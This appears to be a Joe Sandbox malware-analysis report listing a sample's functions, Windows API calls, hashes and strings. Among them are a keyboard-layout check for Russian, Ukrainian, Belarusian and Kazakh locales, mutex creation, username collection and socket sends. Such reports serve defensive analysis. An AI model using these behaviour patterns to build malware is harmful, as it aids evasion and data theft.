Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: CurrentDirectory
String ID: @3P$VUUU$de
API String ID: 1611563598-1108115423
Opcode ID: 67ac9aed081323861285f8ecdea4ec57b4962dda1ae3038497573a03c94fb625
Instruction ID: 69bf87854ed161575e55b4188345c4a8c609482cd01e9865e9748cc8beb3ffe6
Opcode Fuzzy Hash: 67ac9aed081323861285f8ecdea4ec57b4962dda1ae3038497573a03c94fb625
Instruction Fuzzy Hash: E5C2B371A00118DFEB18DF68CC89BEEBB76BF45304F50819CE509A7292DB799A84CF51

Function 005F9910 Relevance: 24.7, APIs: 16, Instructions: 655
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005F8A40: GetTempPathA.KERNEL32(00000104,?,52CC3793,?,00000000), ref: 005F8A87

GetFileAttributesA.KERNEL32(00000000), ref: 005F9983

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: AttributesFilePathTemp
String ID:
API String ID: 3199926297-0
Opcode ID: 7e0d4235a034fc535be87f01d07e646361c799098367334bd76664488fe8d073
Instruction ID: 1ee2c43e9682d2829ec0411db5d3ab51884099adcc4d314969e14704f9b76229
Opcode Fuzzy Hash: 7e0d4235a034fc535be87f01d07e646361c799098367334bd76664488fe8d073
Instruction Fuzzy Hash: FB42B070A0024CDBEF14EBA8C5497EE7FB2BB45314F644248D611673D6D7B94A84CBA2

Function 005F7CE0 Relevance: 7.9, APIs: 5, Instructions: 388
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(0000011C,52CC3793), ref: 005F7D5A
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005F7DBB
GetProcAddress.KERNEL32(00000000), ref: 005F7DC2
GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005F7E83
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 005F7E87

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: InfoSystem$AddressHandleModuleNativeProcVersion
String ID:
API String ID: 374719553-0
Opcode ID: f3f49a313aa326f75a1d597ba60671fe5673919967b787553779bcdf79889f2c
Instruction ID: 412ef74ee939a316dfec87e4583813af07dcd17c04aca61295a2999cdd4984ed
Opcode Fuzzy Hash: f3f49a313aa326f75a1d597ba60671fe5673919967b787553779bcdf79889f2c
Instruction Fuzzy Hash: B7D10B71E006199BDB14EB28DC5A7BD7F72BB46310F90428CE5159B3C2DB785E548BC2

Function 0062643B Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(?,?,0062643A,?,?,?,?,?,0062748E), ref: 0062645D
TerminateProcess.KERNEL32(00000000,?,0062643A,?,?,?,?,?,0062748E), ref: 00626464
ExitProcess.KERNEL32 ref: 00626476

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 1171a46da11946f27c910f1810400267f955fac99c7290dbaad6a0efbe7f6599
Instruction ID: 934aad7fe5a97ead5297b8b3b6c9cd0089dff35818a00b915ac54ed5803d8d0b
Opcode Fuzzy Hash: 1171a46da11946f27c910f1810400267f955fac99c7290dbaad6a0efbe7f6599
Instruction Fuzzy Hash: 68E0B635010A68ABDB927F94EC0DA893BBBEB41751F108419F9458A271CB75DDD2CF81

Function 005F5B00 Relevance: 23.2, APIs: 8, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000419, xrefs: 005F5F88
Keyboard Layout\Preload, xrefs: 005F5F44
00000423, xrefs: 005F5FEA
0000043f, xrefs: 005F601B
00000422, xrefs: 005F5FB9

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 4a40c374f124f7ec29ab642963ae57969efef02f9755075d3470685b8b87d51d
Instruction ID: 3e30f68ca9164d179f61a91e02d023847a58433732c3f154f86ab02c3efa389c
Opcode Fuzzy Hash: 4a40c374f124f7ec29ab642963ae57969efef02f9755075d3470685b8b87d51d
Instruction Fuzzy Hash: 91F1BF7090025DAFEB24DF54CC88BEEBBBAFB45304F504199E609A7281DB749B84CF95

Function 0063195C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00631615: CreateFileW.KERNELBASE(00000000,00000000,?,00631A05,?,?,00000000,?,00631A05,00000000,0000000C), ref: 00631632

GetLastError.KERNEL32 ref: 00631A70
__dosmaperr.LIBCMT ref: 00631A77
GetFileType.KERNELBASE(00000000), ref: 00631A83
GetLastError.KERNEL32 ref: 00631A8D
__dosmaperr.LIBCMT ref: 00631A96
CloseHandle.KERNEL32(00000000), ref: 00631AB6
CloseHandle.KERNEL32(0062AB32), ref: 00631C03
GetLastError.KERNEL32 ref: 00631C35
__dosmaperr.LIBCMT ref: 00631C3C

Strings

H, xrefs: 00631BC1

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 5458f6b6797301d05b7ccf67424fcb6830e7fc77506288809d850d32abc76d39
Instruction ID: 0b528b0b03375e36f71a9223a0c87d7bf2af07c60ca861d9f1ad85f371ecbbe5
Opcode Fuzzy Hash: 5458f6b6797301d05b7ccf67424fcb6830e7fc77506288809d850d32abc76d39
Instruction Fuzzy Hash: E2A13632A045549FCF19EF68ECA5BED7BA2AB07320F14115DE812AF391DB349D12CB91

Function 005FD67C Relevance: 13.9, APIs: 9, Instructions: 446
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 005FD7F3
CreateDirectoryA.KERNELBASE(00000000,00000000), ref: 005FD90F
send.WS2_32(?,?,00000004,00000000), ref: 005FDB0E
send.WS2_32(?,?,00000008,00000000), ref: 005FDB4A

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: send$CreateDirectoryFileModuleName
String ID:
API String ID: 2319890793-0
Opcode ID: 9536de6ff76f3b9cf0aa1792e7d4b77f8c5c3141219615f7fcc2bbd504df059a
Instruction ID: 8be808984c3ffb7636b84c715dd2e93120f8783c2e9abda40d7598c5d4236284
Opcode Fuzzy Hash: 9536de6ff76f3b9cf0aa1792e7d4b77f8c5c3141219615f7fcc2bbd504df059a
Instruction Fuzzy Hash: 73F10671D042189BDB28DB28CC497EEBB76BF45314F1042D8E909A72C2DB755A84CFA5

Function 005FD9AC Relevance: 6.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10bf17470761c7b94897dbe8424b20cc1aa35e899eda8606a25a1aad6fadd66f
Instruction ID: 414c1c1cca4e3ddefd9d50f8492317d1e719454f1679edb1b4d563ab8ac3d0c7
Opcode Fuzzy Hash: 10bf17470761c7b94897dbe8424b20cc1aa35e899eda8606a25a1aad6fadd66f
Instruction Fuzzy Hash: 2941F672A001189FDB28DF78DC857AEBBB6AF85324F11036DE915E73D1DA349940CBA4

Function 005F7760 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 468
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000003E8), ref: 005F7A29

Strings

runas, xrefs: 005F72B3

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: runas
API String ID: 3472027048-4000483414
Opcode ID: fc73cdab06b8119ba8999db99d1e539c9610d939c02402c616af58792e754051
Instruction ID: 98ebf348f3919be85e6f8c0bcb9a1055f7da032d76386dd7cc25feb659ff11e4
Opcode Fuzzy Hash: fc73cdab06b8119ba8999db99d1e539c9610d939c02402c616af58792e754051
Instruction Fuzzy Hash: CCE12471A1414C9BDB09EB78CD467AEBF62AF45304F50825CF801AB3C6DB799A40CB95

Function 005FC296 Relevance: 3.5, APIs: 2, Instructions: 532
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00607840: __Cnd_destroy_in_situ.LIBCPMT ref: 00607938
Part of subcall function 00607840: __Mtx_destroy_in_situ.LIBCPMT ref: 00607941

Sleep.KERNEL32(00001388), ref: 005FC6E9

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situMtx_destroy_in_situSleep
String ID:
API String ID: 113500496-0
Opcode ID: b90d3fb0afc19e32038bb4e3b7e72e2d3008099ae09ca312470a7dac457efaac
Instruction ID: 96322d8d5bb742224299c08d1f6b564beb455410ee4889798261d1d2f9bcfca0
Opcode Fuzzy Hash: b90d3fb0afc19e32038bb4e3b7e72e2d3008099ae09ca312470a7dac457efaac
Instruction Fuzzy Hash: D112BF71A0010C9BDF08DF68C985BEEBFB6FF45304F54422CE905A7282D7799A84CB95

Function 00606B70 Relevance: 3.0, APIs: 2, Instructions: 23
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 005F9910: Sleep.KERNELBASE(000003E8), ref: 005FA875
Part of subcall function 005F9910: CreateMutexA.KERNELBASE(00000000,00000000,006531DC), ref: 005FA893
Part of subcall function 005F9910: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 005FA89C
Part of subcall function 005F9910: GetLastError.KERNEL32 ref: 005FA8A2

Part of subcall function 005F5B00: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 005F606D

CreateThread.KERNEL32(00000000,00000000,Function_00016AB0,00000000,00000000,00000000), ref: 00606B50
Sleep.KERNEL32(00007530), ref: 00606B65

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: CreateSleep$ErrorLastMutexObjectOpenSingleThreadWait
String ID:
API String ID: 3106257662-0
Opcode ID: cbd184aa7bfb9de657206cb9c4bc0e6acbdc31bf7243f20a706387f2f3b2cfca
Instruction ID: eb67caa1747fbdb6ccc065a2bc087f4294f85f364f2c41170623a612f5368a97
Opcode Fuzzy Hash: cbd184aa7bfb9de657206cb9c4bc0e6acbdc31bf7243f20a706387f2f3b2cfca
Instruction Fuzzy Hash: F6E08CB5AC431C66E32433A09C0BF6A7D267B46B50F200010B709AA0D2DEE8342045BF

Function 005FD039 Relevance: 1.9, APIs: 1, Instructions: 386
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 005FD047

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 0a801c161da6fb5534ffc7558629280c6e7b054c96c8c51147e220d89e184248
Instruction ID: 472cc295c7a36b85c629a07cb540bce19ba271bc70119abd927760b5a81435a2
Opcode Fuzzy Hash: 0a801c161da6fb5534ffc7558629280c6e7b054c96c8c51147e220d89e184248
Instruction Fuzzy Hash: 46E1E7719002589BEB19DB28CD497EEBF72AF46304F5082DCE5046B3C2DB799A858F91

Function 005FD5B0 Relevance: 1.7, APIs: 1, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d70eaecef02aeaf253b1f5709d284e43ceb89d2c7d7dff86a3466e6f235d422c
Instruction ID: 17e0dc9ecccbc481344c9ecabef7d9274009553fb782cf30aefb969440dcbad0
Opcode Fuzzy Hash: d70eaecef02aeaf253b1f5709d284e43ceb89d2c7d7dff86a3466e6f235d422c
Instruction Fuzzy Hash: A451BD3090426C9FEB25DB24CC887EEBBB2AB45304F5042D8D44967282DB755FC8CFA1

Function 005FC7D0 Relevance: 1.6, APIs: 1, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3a1b2372abb989ecd33468f6564572d00f3e8c79256aac1cdce08770bc772d1
Instruction ID: f7dfb4fcb1b7abf6babb6d3c15c521821f25dc7a9de67492808f2bcd4d166367
Opcode Fuzzy Hash: e3a1b2372abb989ecd33468f6564572d00f3e8c79256aac1cdce08770bc772d1
Instruction Fuzzy Hash: 4D31803161024CAFEB04CF68C985BDEBBB6FF49704F504629F905A72C1D7B9A980CB94

Function 0062AAF3 Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__wsopen_s.LIBCMT ref: 0062AB2D

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 0b7a69b31aa742a0be29bc58623f7482e58d0862e3fe615c9fe1930cfeed813f
Instruction ID: 269c1a47a73358f5bb86d983864ee361aa618f97411407e88e323b69797b651e
Opcode Fuzzy Hash: 0b7a69b31aa742a0be29bc58623f7482e58d0862e3fe615c9fe1930cfeed813f
Instruction Fuzzy Hash: 71111871A0420AAFCB05DF98E941A9B7BF6EF48304F054059F809AB351D670EE15CBA5

Function 005FB0A0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetUserNameA.ADVAPI32(?,?), ref: 005FB0ED

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: ee69f4a85b15d32a2599ca956cc31f84582485b059a8b57ea7f05245d21c236b
Instruction ID: 423694c187576d7da2de4c3a5ef58203bfbc8c86b424c3319d66391b5544e0a9
Opcode Fuzzy Hash: ee69f4a85b15d32a2599ca956cc31f84582485b059a8b57ea7f05245d21c236b
Instruction Fuzzy Hash: C521EAB191016C9BDB2ADF14CD65BEAB7B8FB19704F0042D9A50663281D7745B88CFA0

Function 006318CE Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00631931

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: ff89ec45d56ad598fc1cdac097a9ffa15eccbe9b6325dd4b30191e09ed1fe268
Instruction ID: 051af6d436f4ef7f4d6601f776eba96ad8a40dbcca61eb171cc5690c20a8e29e
Opcode Fuzzy Hash: ff89ec45d56ad598fc1cdac097a9ffa15eccbe9b6325dd4b30191e09ed1fe268
Instruction Fuzzy Hash: 85012C72C0015DAFCF42AFA89C01AEE7FBAAB09310F144169F918E6191E6318A259BD5

Function 00631615 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00631A05,?,?,00000000,?,00631A05,00000000,0000000C), ref: 00631632

Memory Dump Source

Source File: 00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp, Offset: 005F0000, based on PE: true

Associated: 00000012.00000002.1715746859.00000000005F0000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715808125.0000000000640000.00000002.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715834129.0000000000652000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715855995.0000000000654000.00000008.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715877231.0000000000655000.00000004.00000001.01000000.00000012.sdmpDownload File
Associated: 00000012.00000002.1715899811.0000000000659000.00000002.00000001.01000000.00000012.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_5f0000_NewLatest.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 38a99b8d0a6d02814ceddaba3abb9df90d62dc5a72b65b7523a009705cd7e1a3
Instruction ID: ef3c4f51e7990b079e7b2945d3c6f579868b23d6b987e6098853c7b58fc4e3a0
Opcode Fuzzy Hash: 38a99b8d0a6d02814ceddaba3abb9df90d62dc5a72b65b7523a009705cd7e1a3
Instruction Fuzzy Hash: B4D06C3201010DBBDF028F84DC06EDA3BAAFB48714F118100BA1856060C772E921AB90

